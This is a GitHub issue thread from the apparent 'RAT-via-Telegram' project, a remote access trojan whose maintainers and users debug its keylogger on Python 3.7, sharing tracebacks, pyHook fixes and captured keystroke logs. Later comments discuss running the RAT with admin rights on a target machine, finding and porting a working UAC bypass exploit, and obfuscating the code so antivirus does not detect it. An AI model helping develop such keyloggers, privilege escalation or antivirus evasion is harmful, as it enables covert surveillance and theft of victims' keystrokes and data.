This repository has been archived by the owner on Aug 4, 2020. It is now read-only.

Keylogs problem #51

Open
Dagdelo opened this issue Oct 21, 2018 · 29 comments

@Dagdelo

Dagdelo commented Oct 21, 2018

After starting the server this log spills out:

File "C:\Python37\lib\ctypes\__init__.py", line 63, in create_string_buffer
    raise TypeError(init)

The lines of code that the log complains about:

118> executable = ctypes.create_string_buffer("\x00" * 512)
...
134> data = get_curr_window()
...
@mvrozanti
Owner

We recently moved to Python 3.7; there might be a few bugs here and there. I'm already looking into it.

@mvrozanti
Owner

mvrozanti commented Oct 21, 2018

Please try 13a7b8d (lines 119 and 122)

@mvrozanti mvrozanti reopened this Oct 21, 2018
@mvrozanti
Owner

mvrozanti commented Oct 21, 2018

Didn't mean to close this.
@Dagdelo Please try pip install pyHook-1.5.1-cp37-cp37m-win_amd64.whl and recompiling; we added a new pyHook wheel for Python3.7

@Dagdelo
Author

Dagdelo commented Oct 21, 2018

Well, it seems to be fixed, but it still doesn't work properly.

                Got message from 400496256: /keylogs


TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'

The keylogs output file:

[ PID 10500 - b'Telegram.exe' - b'Telegram' ]
PCKEKEYLOGS
[ PID 10500 - b'Telegram.exe' - b'Telegram' ]
KEKEY

It seems to only keylog the Telegram window. I typed in Chrome and WhatsApp. And of course, after the complaint the server stops.

@mvrozanti
Owner

mvrozanti commented Oct 21, 2018

Are you sure you have recompiled? I'm getting ok results on Chrome browser:

[ PID 1728 - b'chrome.exe' - b'test - Pesquisa Google - Google Chrome' ]
EH<Back><Back><Back><Back><Back><Back>ESTE<Space>EH<Space>UM<Space>TESTE<Space>AMIGO<Return>
[ PID 2952 - b'cmd.exe' - b'C:\\Windows\\system32\\cmd.exe - RATAttack.exe' ]
<Lcontrol><Lmenu><Tab>
[ PID 1176 - b'Explorer.EXE' - b'Documents' ]
<Lmenu><Tab>

@mvrozanti mvrozanti reopened this Oct 21, 2018
@Dagdelo
Author

Dagdelo commented Oct 21, 2018

Yeah, I recompiled and RATAttack.exe works well, but that's another issue... But unfortunately it only logs the Telegram window... And after a while this is logged on the server:

TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'

@mvrozanti
Owner

We actually changed the pyHook wheel to match Python 3.7; can you try running pip install pyHook-1.5.1-cp37-cp37m-win_amd64.whl and recompiling?

@Dagdelo
Author

Dagdelo commented Oct 22, 2018

With original pyHook, on Python 3.7/Windows 10:

C:\RAT-via-Telegram>python RATAttack.py
{'message_id': 223, 'from': {'id': xxxxxxxxx, 'is_bot': True, 'first_name': 'RAT Bot', 'username': 'D83_bot'}, 'chat': {'id': yyyyyyyyy, 'first_name': 'Henrique', 'type': 'private'}, 'date': 1540240212, 'text': "Dagdelo: I'm up."}
Dagdelo: I'm up.
Listening for commands on Dagdelo...
<Lwin><Lwin><Lwin>DBLOCO<Return>
TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'

With pyHook fixed version from Answeror (found on this reddit post):

C:\RAT-via-Telegram>python RATAttack.py
{'message_id': 224, 'from': {'id': 663000828, 'is_bot': True, 'first_name': 'RAT Bot', 'username': 'D83_bot'}, 'chat': {'id': 400496256, 'first_name': 'Henrique', 'type': 'private'}, 'date': 1540240784, 'text': "Dagdelo: I'm up."}
Dagdelo: I'm up.
Listening for commands on Dagdelo...
C:\RAT-via-Telegram>

With this the program simply stops working after opening Notepad (Bloco de notas) or typing some combinations like 'Alt+Tab'; 'Win+D'; 'Win+M' ... etc.

@mvrozanti
Owner

mvrozanti commented Oct 23, 2018

Can you post the output of python -V?

@Dagdelo
Author

Dagdelo commented Oct 23, 2018

Here is the output (much longer than I expected!). If you want python -V:

C:\Users\Henrique>python -V
Python 3.7.0

@mvrozanti
Owner

mvrozanti commented Oct 23, 2018

The problem

Probable fix

Another problem:

Known bugs
PyInstaller can't build single-file executables using pyHook. This may be fixed in 1.5.1, but hasn't been tested.

We could try and replace current pyHook module but it seems a lot of work; I'm yet to read this fork

@Dagdelo
Author

Dagdelo commented Oct 23, 2018

Cool. But have you looked at https://github.com/Answeror/pyhook_py3k ?

@mvrozanti
Owner

Seems legit but I still gotta take the time to read it; if it works we can add it as a submodule

@mvrozanti
Owner

Can others confirm this issue in their machines?

@Dagdelo
Author

Dagdelo commented Oct 31, 2018

About the program not being able to log Chrome: this only happens when Chrome is running with administrative privileges (as administrator) and the program is running without those privileges.

About the program quitting when it encounters certain characters in window titles: this is a pyhook bug related to encoding.

@mvrozanti
Owner

mvrozanti commented Oct 31, 2018

It should be the other way around: the RAT being run as admin and Chrome (usually) being opened with regular privileges. Did you get it working though? Is this a closeable issue?

@Dagdelo
Author

Dagdelo commented Oct 31, 2018

Yeah. But for run with admin in the target machine, it needs to bypass UAC or find another way to escalate privileges to admin.

@mvrozanti
Owner

mvrozanti commented Oct 31, 2018

I'm not sure if the latest windows versions are still vulnerable but... can anyone test this?

@Dagdelo
Author

Dagdelo commented Oct 31, 2018

I think it's pretty complicated. There are several exploits in various languages but in python I do not know any ... And you still need to obfuscate the code so that the anti-virus does not detect it.

@Ali-Fani

> I'm not sure if the latest windows versions are still vulnerable but... can anyone test this?

It works, but it's Python 2.7; it needs to be ported.

@dudeisbrendan03
Collaborator

pwnage

@dudeisbrendan03
Collaborator

Examples of UAC bypasses in python

@Dagdelo
Author

Dagdelo commented Nov 1, 2018

> pwnage

Note found.

@Ali-Fani

Ali-Fani commented Nov 1, 2018

> Can others confirm this issue in their machines?

It happens here too.

@dudeisbrendan03
Collaborator

My bad, this is pwnage

@dudeisbrendan03
Collaborator

Put the wrong link @Dagdelo, that one works ^

@mvrozanti
Owner

Huge dependency but seems so useful. Great find. I wonder if it's worth the bloat.

@dudeisbrendan03
Collaborator

It's on 2.7, instead of using it as a dependency go ahead and look for one UAC exploit that currently works - mold that into something we can use and then credit the original user. No point in bringing in everything

@dudeisbrendan03
Collaborator

It would be a lot of work to bring it all anyway, would have to make it all functional on PY3
